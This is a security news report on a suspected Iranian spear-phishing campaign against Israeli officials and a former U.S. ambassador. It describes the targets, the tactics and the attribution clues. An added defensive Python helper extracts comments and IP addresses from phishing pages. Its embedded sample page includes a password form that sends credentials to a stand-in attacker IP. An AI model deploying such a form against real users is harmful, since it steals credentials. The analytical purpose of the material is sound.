
Iranian Hacking Campaign that Included Former U.S. Ambassador

A group of hackers who are possibly affiliated with Iran have been running a spear-phishing campaign that includes several key officials. According to reports, the Iranian hackers impersonated a former US ambassador in order to target the chairperson of a major think tank.

The hackers gained access to one of the two targets' mailboxes (the report does not specify which) and then impersonated the U.S. ambassador by continuing a genuine email thread the pair had exchanged two weeks earlier.

Who were the targets?

  • The hackers’ target list includes former Israeli officials, high-ranking military personnel, the head of a leading security think tank, and the former U.S. ambassador to Israel.
  • The targets in this campaign included: Tzipi Livni, a former Israeli foreign minister and deputy prime minister; an unnamed former Israeli major general; a member of one of Israel’s leading security think tanks; a senior executive in the Israeli defense industry; a former member of a well-known Middle East research center; and an unnamed former U.S. ambassador to Israel.

What’s the hacking campaign all about?

The campaign includes spear phishing using both legitimate and phony email accounts, a bogus URL shortener, and a credential-harvesting Yahoo-themed phishing page.
  • The campaign also used a legitimate document verification service to obtain targets' ID or passport scans.
  • One part of the campaign included a credential-stealing page mocked up as an invitation to a “Skier’s Roundtable.”
  • Researchers noted that the campaign may have been nothing more than a credential-theft operation.

Who is behind these attacks?

  • Reports in Israel also speculate that the campaign could be the work of Phosphorus, a prolific Iranian government-connected cyber-espionage group also known as APT35, Newscaster Team, Charming Kitten, or Magic Hound.
  • The partial attribution is based on the campaign’s prime targets, an Iranian IP address in the source code of the Yahoo phishing page, and old, commented-out code (code that is present but never executed) from a Phosphorus campaign analyzed by Microsoft in 2020.
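As an added example (not from the report or the researchers who analyzed the campaign), a small Python triage helper that pulls the two kinds of attribution artifacts mentioned above, HTML comments and IP literals, out of a captured phishing page's source. The page source and the addresses in it are constructed for illustration, using documentation IP ranges rather than anything from the real campaign.

```python
import re
import ipaddress
from html.parser import HTMLParser

# Constructed sample of a credential-harvesting page (NOT the campaign's real page):
# an IP literal in a script tag and a commented-out legacy block, the two kinds of
# leftover that supported attribution in the report above.
SAMPLE_PAGE = """<html><head><title>Sign in</title>
<script>var api = "http://203.0.113.45/collect";</script>
<!-- old redirect: window.location = "http://198.51.100.7/login" -->
<!-- build 2020-03 -->
</head><body>
<form action="http://203.0.113.45/collect" method="post">
<input name="user"><input name="pass" type="password"></form>
<script>/* inline: fetch('http://10.0.0.5/x') */</script>
</body></html>"""

# RFC 1918 and loopback space cannot point at attacker infrastructure; drop it.
NON_ROUTABLE = [ipaddress.ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


class CommentCollector(HTMLParser):
    """Collects every HTML comment; dead code left in comments is a common reuse artifact."""
    def __init__(self):
        super().__init__()
        self.comments = []

    def handle_comment(self, data):
        self.comments.append(data.strip())


def extract_comments(html):
    """Return all HTML comments in document order."""
    parser = CommentCollector()
    parser.feed(html)
    return parser.comments


def extract_public_ips(html):
    """Return sorted unique IPv4 literals outside private/loopback ranges."""
    found = set()
    for candidate in IPV4.findall(html):
        try:
            ip = ipaddress.ip_address(candidate)
        except ValueError:       # e.g. an octet above 255
            continue
        if not any(ip in net for net in NON_ROUTABLE):
            found.add(str(ip))
    return sorted(found)
```

Run the two functions over a saved copy of a suspect page and compare the comments against fragments from previously analyzed campaigns, and the IPs against hosting and geolocation records, before treating either as more than a weak attribution signal.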

Final comments

The exposed spear-phishing infrastructure focuses attention on high-ranking Israeli officials in the midst of escalating tensions between Israel and Iran.
Cyware Publisher